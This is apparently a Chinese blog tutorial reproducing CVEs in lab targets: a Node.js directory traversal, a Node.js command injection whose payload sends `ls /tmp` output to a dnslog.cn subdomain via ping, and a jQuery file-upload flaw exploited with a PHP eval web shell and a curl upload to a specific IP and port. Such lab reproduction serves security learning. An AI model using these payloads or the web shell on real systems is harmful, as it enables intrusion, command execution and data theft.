框架安全&CVE复现&Django&Flask&Node.JS&JQuery

javascript开发框架

靶场搭建可用蓝易云服务器

😘😘😘😘😘😘点击查看详情

Node

Node.js 目录穿越漏洞(CVE-2017-14849)

我们可以通过F12看到有很多文件加载了

那么目录穿越是什么呢

其实就是攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件

那么我们尝试加载

main.js文件

我们可以看到是无法读取到的

说明我们的路径还是不正确

那么如果真的要搞清楚这个路径需要用到工具去对路径进行拆解了

那么这个文件的真实路径是

/static/main.js

我们尝试下

可以看见是读取的到的

那么就证明了

如果你知道路径你就可以去穿越目录了

参考

(CVE-2017-14849)Node.js 目录穿越漏洞

node.js 命令执行 (CVE-2021-21315)

这个的话怎么搞呢

首先用到一个网站工具

DNSLog Platform

获取一个url

这时候套用模板就可以了

复制代码
/api/getServices?name[]=$(ping%20`ls%20/tmp`.qki7ut.dnslog.cn)

替换上面的url

复制代码
/api/getServices?name[]=$(ping%20`ls%20/tmp`.n9wgwv.dnslog.cn)

直接替换上

然后访问

这个时候我们回到那个工具网站

点击上面的那个按钮刷新几下就🆗了

jQuery

jQuery 文件上传漏洞(CVE-2018-9207)

主页面

然后写一个一句话木马

php 复制代码
<?php
    @eval($_POST['shell']);
    ?>

然后在当前目录下打开cmd

复制代码
curl -F "myfile=@shell.php" "http://123.58.236.76:19514/jquery-upload-file/php/upload.php"

执行这条命令

只需要改目标ip和端口还有就你的一句话木马文件就可以了

/jquery-upload-file/

相关推荐
xuansec2 分钟前
ThinkPHP 6.0.X 反序列化漏洞利用指南(PHPGGC 工具版)
安全·php
酿情师2 分钟前
2026软件系统安全赛初赛RSA(赛后复盘)
android·网络·安全·密码学·rsa
智擎软件测评小祺3 分钟前
从报告看懂安全隐患,提升防护能力
安全·web安全·渗透测试·测试·检测·cma·cnas
WangJunXiang615 分钟前
初识Flask框架
后端·python·flask
MicrosoftReactor25 分钟前
技术速递|GitHub 初学者指南:GitHub 安全入门
安全·github
yuanmazhiwu1 小时前
计算机毕业设计:Python全国空气质量与气象监测平台 Flask框架 可视化 数据分析 机器学习 天气 深度学习 AI 空气质量分析(建议收藏)✅
人工智能·python·深度学习·数据挖掘·flask·汽车·课程设计
上海云盾安全满满10 小时前
游戏业务使用什么防护最安全
安全·游戏
普通网友12 小时前
阿里云国际版服务器,真的是学生党的性价比之选吗?
后端·python·阿里云·flask·云计算
云栖梦泽13 小时前
AI安全合规与治理:行业发展趋势与职业展望
大数据·人工智能·安全
小陈工13 小时前
2026年4月2日技术资讯洞察:数据库融合革命、端侧AI突破与脑机接口产业化
开发语言·前端·数据库·人工智能·python·安全